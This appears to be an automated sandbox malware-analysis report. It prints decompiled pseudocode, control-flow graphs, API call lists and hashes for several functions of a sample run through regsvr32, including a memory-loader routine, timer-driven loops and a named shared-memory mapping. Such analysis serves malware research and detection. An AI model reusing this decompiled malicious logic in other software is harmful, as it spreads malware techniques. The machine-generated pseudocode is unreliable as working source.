                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 603507560-0
                                                                                                                                                                                                                                    • Opcode ID: 74435c078f77b571f571a78e0128cfa777ca4978a8d1b777363e9d1d0b032063
                                                                                                                                                                                                                                    • Instruction ID: e368e5e2653bd0d454932b50b7f77489409208b0f4b3c8b9388bd93b7d0f1705
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74435c078f77b571f571a78e0128cfa777ca4978a8d1b777363e9d1d0b032063
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C09115B1D40218EFCF21AFA4DC84A9E7BBDAF48354F144855F8099B2A0D731E969DB60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E6786, Relevance: 16.6, APIs: 11, Instructions: 150timememoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 97 23e6786-23e67b2 memset CreateWaitableTimerA 98 23e67b8-23e6808 _allmul SetWaitableTimer WaitForMultipleObjects 97->98 99 23e6913-23e6919 GetLastError 97->99 101 23e680a-23e680d 98->101 102 23e6883-23e6888 98->102 100 23e691c-23e6923 99->100 103 23e680f call 23e73fd 101->103 104 23e6818 101->104 105 23e6889-23e688d 102->105 110 23e6814-23e6816 103->110 109 23e6822 104->109 107 23e688f-23e6897 HeapFree 105->107 108 23e689d-23e68a1 105->108 107->108 108->105 111 23e68a3-23e68ac CloseHandle 108->111 112 23e6825-23e6829 109->112 110->104 110->109 111->100 113 23e683b-23e6864 call 23e8504 112->113 114 23e682b-23e6832 112->114 118 23e68ae-23e68b3 113->118 119 23e6866-23e686f 113->119 114->113 115 23e6834 114->115 115->113 121 23e68b5-23e68bb 118->121 122 23e68d2-23e68da 118->122 119->112 120 23e6871-23e6880 call 23e3bf1 119->120 120->102 121->102 125 23e68bd-23e68d0 call 23ea1b0 121->125 123 23e68e0-23e6908 _allmul SetWaitableTimer WaitForMultipleObjects 122->123 123->112 127 23e690e 123->127 125->123 127->102
                                                                                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                                                                                    			E023E6786(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x23ed240);
					_v20 = 0;
					_v16 = 0;
					L023EB0C8();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x23ed26c; // 0x2cc
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x23ed24c = 5;
						} else {
							_t68 = E023E73FD(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x23ed260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E023E8504(_t72, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_t90 = _t65 - 3;
						_v12 = _t65;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E023E3BF1(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x23ed244);
							goto L21;
						} else {
							__eflags =  *0x23ed248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E023EA1B0();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x23ed248);
								L21:
								L023EB0C8();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t64;
								_v8.LowPart = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x23ed238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                                                                                                                                                                                                                    0x023e6786
                                                                                                                                                                                                                                    0x023e6798
                                                                                                                                                                                                                                    0x023e679b
                                                                                                                                                                                                                                    0x023e67a7
                                                                                                                                                                                                                                    0x023e67af
                                                                                                                                                                                                                                    0x023e67b2
                                                                                                                                                                                                                                    0x023e6919
                                                                                                                                                                                                                                    0x023e67b8
                                                                                                                                                                                                                                    0x023e67b8
                                                                                                                                                                                                                                    0x023e67ba
                                                                                                                                                                                                                                    0x023e67bf
                                                                                                                                                                                                                                    0x023e67c0
                                                                                                                                                                                                                                    0x023e67c6
                                                                                                                                                                                                                                    0x023e67c9
                                                                                                                                                                                                                                    0x023e67cc
                                                                                                                                                                                                                                    0x023e67da
                                                                                                                                                                                                                                    0x023e67e5
                                                                                                                                                                                                                                    0x023e67e8
                                                                                                                                                                                                                                    0x023e67ea
                                                                                                                                                                                                                                    0x023e67f7
                                                                                                                                                                                                                                    0x023e6801
                                                                                                                                                                                                                                    0x023e6805
                                                                                                                                                                                                                                    0x023e6808
                                                                                                                                                                                                                                    0x023e680d
                                                                                                                                                                                                                                    0x023e6818
                                                                                                                                                                                                                                    0x023e6818
                                                                                                                                                                                                                                    0x023e680f
                                                                                                                                                                                                                                    0x023e680f
                                                                                                                                                                                                                                    0x023e6816
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e6816
                                                                                                                                                                                                                                    0x023e6822
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e6825
                                                                                                                                                                                                                                    0x023e6829
                                                                                                                                                                                                                                    0x023e6834
                                                                                                                                                                                                                                    0x023e6834
                                                                                                                                                                                                                                    0x023e683b
                                                                                                                                                                                                                                    0x023e6844
                                                                                                                                                                                                                                    0x023e684b
                                                                                                                                                                                                                                    0x023e6854
                                                                                                                                                                                                                                    0x023e6857
                                                                                                                                                                                                                                    0x023e685a
                                                                                                                                                                                                                                    0x023e6861
                                                                                                                                                                                                                                    0x023e6864
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e6866
                                                                                                                                                                                                                                    0x023e6869
                                                                                                                                                                                                                                    0x023e686c
                                                                                                                                                                                                                                    0x023e686f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e6871
                                                                                                                                                                                                                                    0x023e6880
                                                                                                                                                                                                                                    0x023e6880
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e68ae
                                                                                                                                                                                                                                    0x023e68ae
                                                                                                                                                                                                                                    0x023e68b3
                                                                                                                                                                                                                                    0x023e68d2
                                                                                                                                                                                                                                    0x023e68d4
                                                                                                                                                                                                                                    0x023e68d9
                                                                                                                                                                                                                                    0x023e68da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e68b5
                                                                                                                                                                                                                                    0x023e68b5
                                                                                                                                                                                                                                    0x023e68bb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e68bd
                                                                                                                                                                                                                                    0x023e68bd
                                                                                                                                                                                                                                    0x023e68c2
                                                                                                                                                                                                                                    0x023e68c4
                                                                                                                                                                                                                                    0x023e68c9
                                                                                                                                                                                                                                    0x023e68ca
                                                                                                                                                                                                                                    0x023e68e0
                                                                                                                                                                                                                                    0x023e68e0
                                                                                                                                                                                                                                    0x023e68e8
                                                                                                                                                                                                                                    0x023e68f3
                                                                                                                                                                                                                                    0x023e68f6
                                                                                                                                                                                                                                    0x023e6901
                                                                                                                                                                                                                                    0x023e6903
                                                                                                                                                                                                                                    0x023e6905
                                                                                                                                                                                                                                    0x023e6908
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e690e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e690e
                                                                                                                                                                                                                                    0x023e6908
                                                                                                                                                                                                                                    0x023e68bb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e68b3
                                                                                                                                                                                                                                    0x023e6883
                                                                                                                                                                                                                                    0x023e6885
                                                                                                                                                                                                                                    0x023e6888
                                                                                                                                                                                                                                    0x023e6889
                                                                                                                                                                                                                                    0x023e6889
                                                                                                                                                                                                                                    0x023e688d
                                                                                                                                                                                                                                    0x023e6897
                                                                                                                                                                                                                                    0x023e6897
                                                                                                                                                                                                                                    0x023e689d
                                                                                                                                                                                                                                    0x023e68a0
                                                                                                                                                                                                                                    0x023e68a0
                                                                                                                                                                                                                                    0x023e68a6
                                                                                                                                                                                                                                    0x023e68a6
                                                                                                                                                                                                                                    0x023e6923
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.NTDLL ref: 023E679B
                                                                                                                                                                                                                                    • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 023E67A7
                                                                                                                                                                                                                                    • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 023E67CC
                                                                                                                                                                                                                                    • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 023E67E8
                                                                                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 023E6801
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 023E6897
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 023E68A6
                                                                                                                                                                                                                                    • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 023E68E0
                                                                                                                                                                                                                                    • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,023E2417,?), ref: 023E68F6
                                                                                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 023E6901
                                                                                                                                                                                                                                      • Part of subcall function 023E73FD: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04CC9388,00000000,?,76D7F710,00000000,76D7F730), ref: 023E744C
                                                                                                                                                                                                                                      • Part of subcall function 023E73FD: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04CC93C0,?,00000000,30314549,00000014,004F0053,04CC937C), ref: 023E74E9
                                                                                                                                                                                                                                      • Part of subcall function 023E73FD: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,023E6814), ref: 023E74FB
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 023E6913
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3521023985-0
                                                                                                                                                                                                                                    • Opcode ID: 41fe28f76a0db25d58ee616967adb44af186baae1a640d0c37878d1ac117f3d9
                                                                                                                                                                                                                                    • Instruction ID: eb681d3fe90812d8b869abe9ad61e61a29dd2525b235586fc57e40e2dddd184e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41fe28f76a0db25d58ee616967adb44af186baae1a640d0c37878d1ac117f3d9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56512BB1C01229EADF20DF94DC45AEEBFBDEF59324F104516E826A61D0D7709A58CFA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 026D163F, Relevance: 15.1, APIs: 10, Instructions: 98threadsleepsynchronizationCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 130 26d163f-26d1652 call 26d1850 133 26d1658 130->133 134 26d1740-26d1742 130->134 135 26d1659-26d1690 GetSystemTime SwitchToThread call 26d18f4 Sleep 133->135 138 26d1692-26d1694 135->138 139 26d173f 138->139 140 26d169a-26d169e 138->140 139->134 141 26d16ef-26d170a call 26d12dc 140->141 142 26d16a0-26d16ab call 26d1538 140->142 149 26d170c-26d171a WaitForSingleObject 141->149 150 26d1730-26d1732 GetLastError 141->150 147 26d16ad-26d16bf GetLongPathNameW 142->147 148 26d16e9 142->148 152 26d16e1-26d16e7 147->152 153 26d16c1-26d16d2 call 26d1de1 147->153 148->141 154 26d171c-26d1721 GetExitCodeThread 149->154 155 26d1727-26d172e CloseHandle 149->155 151 26d1735-26d173b 150->151 151->139 156 26d173d GetLastError 151->156 152->141 153->152 159 26d16d4-26d16da GetLongPathNameW call 26d1dfc 153->159 154->155 155->151 156->139 161 26d16df 159->161 161->141
                                                                                                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                                                                                                    			E026D163F(char _a4) {
				long _v8;
				struct _SYSTEMTIME _v24;
				char _v48;
				void* __edi;
				long _t20;
				int _t22;
				long _t25;
				long _t26;
				long _t30;
				void* _t36;
				intOrPtr _t38;
				intOrPtr _t43;
				signed int _t44;
				void* _t48;
				signed int _t51;
				void* _t54;
				intOrPtr* _t55;

				_t20 = E026D1850();
				_v8 = _t20;
				if(_t20 != 0) {
					return _t20;
				}
				do {
					GetSystemTime( &_v24);
					_t22 = SwitchToThread();
					asm("cdq");
					_t44 = 9;
					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
					_t25 = E026D18F4(0, _t51); // executed
					_v8 = _t25;
					Sleep(_t51 << 5); // executed
					_t26 = _v8;
				} while (_t26 == 0xc);
				if(_t26 != 0) {
					L18:
					return _t26;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t54 = E026D12DC(E026D135A,  &_v48);
					if(_t54 == 0) {
						_v8 = GetLastError();
					} else {
						_t30 = WaitForSingleObject(_t54, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t54,  &_v8);
						}
						CloseHandle(_t54);
					}
					_t26 = _v8;
					if(_t26 == 0xffffffff) {
						_t26 = GetLastError();
					}
					goto L18;
				}
				if(E026D1538(_t44,  &_a4) != 0) {
					 *0x26d4138 = 0;
					goto L11;
				}
				_t43 = _a4;
				_t55 = __imp__GetLongPathNameW;
				_t36 =  *_t55(_t43, 0, 0); // executed
				_t48 = _t36;
				if(_t48 == 0) {
					L9:
					 *0x26d4138 = _t43;
					goto L11;
				}
				_t14 = _t48 + 2; // 0x2
				_t38 = E026D1DE1(_t48 + _t14);
				 *0x26d4138 = _t38;
				if(_t38 == 0) {
					goto L9;
				}
				 *_t55(_t43, _t38, _t48); // executed
				E026D1DFC(_t43);
				goto L11;
			}




















                                                                                                                                                                                                                                    0x026d1646
                                                                                                                                                                                                                                    0x026d164f
                                                                                                                                                                                                                                    0x026d1652
                                                                                                                                                                                                                                    0x026d1742
                                                                                                                                                                                                                                    0x026d1742
                                                                                                                                                                                                                                    0x026d1659
                                                                                                                                                                                                                                    0x026d165d
                                                                                                                                                                                                                                    0x026d1663
                                                                                                                                                                                                                                    0x026d1671
                                                                                                                                                                                                                                    0x026d1672
                                                                                                                                                                                                                                    0x026d1675
                                                                                                                                                                                                                                    0x026d1678
                                                                                                                                                                                                                                    0x026d1681
                                                                                                                                                                                                                                    0x026d1684
                                                                                                                                                                                                                                    0x026d168a
                                                                                                                                                                                                                                    0x026d168d
                                                                                                                                                                                                                                    0x026d1694
                                                                                                                                                                                                                                    0x026d173f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d173f
                                                                                                                                                                                                                                    0x026d169e
                                                                                                                                                                                                                                    0x026d16ef
                                                                                                                                                                                                                                    0x026d16ef
                                                                                                                                                                                                                                    0x026d1705
                                                                                                                                                                                                                                    0x026d170a
                                                                                                                                                                                                                                    0x026d1732
                                                                                                                                                                                                                                    0x026d170c
                                                                                                                                                                                                                                    0x026d170f
                                                                                                                                                                                                                                    0x026d1717
                                                                                                                                                                                                                                    0x026d171a
                                                                                                                                                                                                                                    0x026d1721
                                                                                                                                                                                                                                    0x026d1721
                                                                                                                                                                                                                                    0x026d1728
                                                                                                                                                                                                                                    0x026d1728
                                                                                                                                                                                                                                    0x026d1735
                                                                                                                                                                                                                                    0x026d173b
                                                                                                                                                                                                                                    0x026d173d
                                                                                                                                                                                                                                    0x026d173d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d173b
                                                                                                                                                                                                                                    0x026d16ab
                                                                                                                                                                                                                                    0x026d16e9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d16e9
                                                                                                                                                                                                                                    0x026d16ad
                                                                                                                                                                                                                                    0x026d16b0
                                                                                                                                                                                                                                    0x026d16b9
                                                                                                                                                                                                                                    0x026d16bb
                                                                                                                                                                                                                                    0x026d16bf
                                                                                                                                                                                                                                    0x026d16e1
                                                                                                                                                                                                                                    0x026d16e1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d16e1
                                                                                                                                                                                                                                    0x026d16c1
                                                                                                                                                                                                                                    0x026d16c6
                                                                                                                                                                                                                                    0x026d16cd
                                                                                                                                                                                                                                    0x026d16d2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d16d7
                                                                                                                                                                                                                                    0x026d16da
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 026D1850: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,026D164B,76D263F0), ref: 026D185F
                                                                                                                                                                                                                                      • Part of subcall function 026D1850: GetVersion.KERNEL32 ref: 026D186E
                                                                                                                                                                                                                                      • Part of subcall function 026D1850: GetCurrentProcessId.KERNEL32 ref: 026D1885
                                                                                                                                                                                                                                      • Part of subcall function 026D1850: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 026D189E
                                                                                                                                                                                                                                    • GetSystemTime.KERNEL32(?,00000000,76D263F0), ref: 026D165D
                                                                                                                                                                                                                                    • SwitchToThread.KERNEL32 ref: 026D1663
                                                                                                                                                                                                                                      • Part of subcall function 026D18F4: VirtualAlloc.KERNELBASE(00000000,026D167D,00003000,00000004,?,?,026D167D,00000000), ref: 026D194A
                                                                                                                                                                                                                                      • Part of subcall function 026D18F4: memcpy.NTDLL(?,?,026D167D,?,?,026D167D,00000000), ref: 026D19DC
                                                                                                                                                                                                                                      • Part of subcall function 026D18F4: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,026D167D,00000000), ref: 026D19F7
                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000000,00000000), ref: 026D1684
                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 026D16B9
                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 026D16D7
                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 026D170F
                                                                                                                                                                                                                                    • GetExitCodeThread.KERNEL32(00000000,?), ref: 026D1721
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 026D1728
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 026D1730
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 026D173D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2280543912-0
                                                                                                                                                                                                                                    • Opcode ID: db239be5939180da55019a94bc91fc027bd16ed16b50a9c9acd266a6b49186c1
                                                                                                                                                                                                                                    • Instruction ID: 4bc4eb3e77517ac660d8ee71f17ac71a520ff85c09dcfe1962148c786fe2af19
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: db239be5939180da55019a94bc91fc027bd16ed16b50a9c9acd266a6b49186c1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB31D475D0124CABCB10EBF5DC84AAE77BDEF46250B2445AAE918D3340EBB0CA51CF61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 026D102F, Relevance: 13.6, APIs: 9, Instructions: 81filetimeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 162 26d102f-26d1086 GetSystemTimeAsFileTime _aulldiv _snwprintf 163 26d108d-26d10a6 CreateFileMappingW 162->163 164 26d1088 162->164 165 26d10a8-26d10b1 163->165 166 26d10f0-26d10f6 GetLastError 163->166 164->163 167 26d10c1-26d10cf MapViewOfFile 165->167 168 26d10b3-26d10ba GetLastError 165->168 169 26d10f8-26d10fe 166->169 171 26d10df-26d10e5 GetLastError 167->171 172 26d10d1-26d10dd 167->172 168->167 170 26d10bc-26d10bf 168->170 173 26d10e7-26d10ee CloseHandle 170->173 171->169 171->173 172->169 173->169
                                                                                                                                                                                                                                    C-Code - Quality: 69%
                                                                                                                                                                                                                                    			E026D102F(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L026D2100();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x26d4150;
				_push(_t15 + 0x26d505e);
				_push(_t15 + 0x26d5054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L026D20FA();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x26d4140, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














                                                                                                                                                                                                                                    0x026d102f
                                                                                                                                                                                                                                    0x026d1038
                                                                                                                                                                                                                                    0x026d103c
                                                                                                                                                                                                                                    0x026d1042
                                                                                                                                                                                                                                    0x026d1047
                                                                                                                                                                                                                                    0x026d104c
                                                                                                                                                                                                                                    0x026d104f
                                                                                                                                                                                                                                    0x026d1052
                                                                                                                                                                                                                                    0x026d1057
                                                                                                                                                                                                                                    0x026d1058
                                                                                                                                                                                                                                    0x026d105b
                                                                                                                                                                                                                                    0x026d1066
                                                                                                                                                                                                                                    0x026d106d
                                                                                                                                                                                                                                    0x026d1071
                                                                                                                                                                                                                                    0x026d1073
                                                                                                                                                                                                                                    0x026d1074
                                                                                                                                                                                                                                    0x026d1077
                                                                                                                                                                                                                                    0x026d107c
                                                                                                                                                                                                                                    0x026d1086
                                                                                                                                                                                                                                    0x026d1088
                                                                                                                                                                                                                                    0x026d1088
                                                                                                                                                                                                                                    0x026d109c
                                                                                                                                                                                                                                    0x026d10a2
                                                                                                                                                                                                                                    0x026d10a6
                                                                                                                                                                                                                                    0x026d10f6
                                                                                                                                                                                                                                    0x026d10a8
                                                                                                                                                                                                                                    0x026d10b1
                                                                                                                                                                                                                                    0x026d10c7
                                                                                                                                                                                                                                    0x026d10cf
                                                                                                                                                                                                                                    0x026d10e1
                                                                                                                                                                                                                                    0x026d10e5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d10d1
                                                                                                                                                                                                                                    0x026d10d4
                                                                                                                                                                                                                                    0x026d10d9
                                                                                                                                                                                                                                    0x026d10db
                                                                                                                                                                                                                                    0x026d10db
                                                                                                                                                                                                                                    0x026d10bc
                                                                                                                                                                                                                                    0x026d10be
                                                                                                                                                                                                                                    0x026d10e7
                                                                                                                                                                                                                                    0x026d10e8
                                                                                                                                                                                                                                    0x026d10e8
                                                                                                                                                                                                                                    0x026d10b1
                                                                                                                                                                                                                                    0x026d10fe

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 026D103C
                                                                                                                                                                                                                                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 026D1052
                                                                                                                                                                                                                                    • _snwprintf.NTDLL ref: 026D1077
                                                                                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(000000FF,026D4140,00000004,00000000,?,?), ref: 026D109C
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 026D10B3
                                                                                                                                                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 026D10C7
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 026D10DF
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 026D10E8
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 026D10F0
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
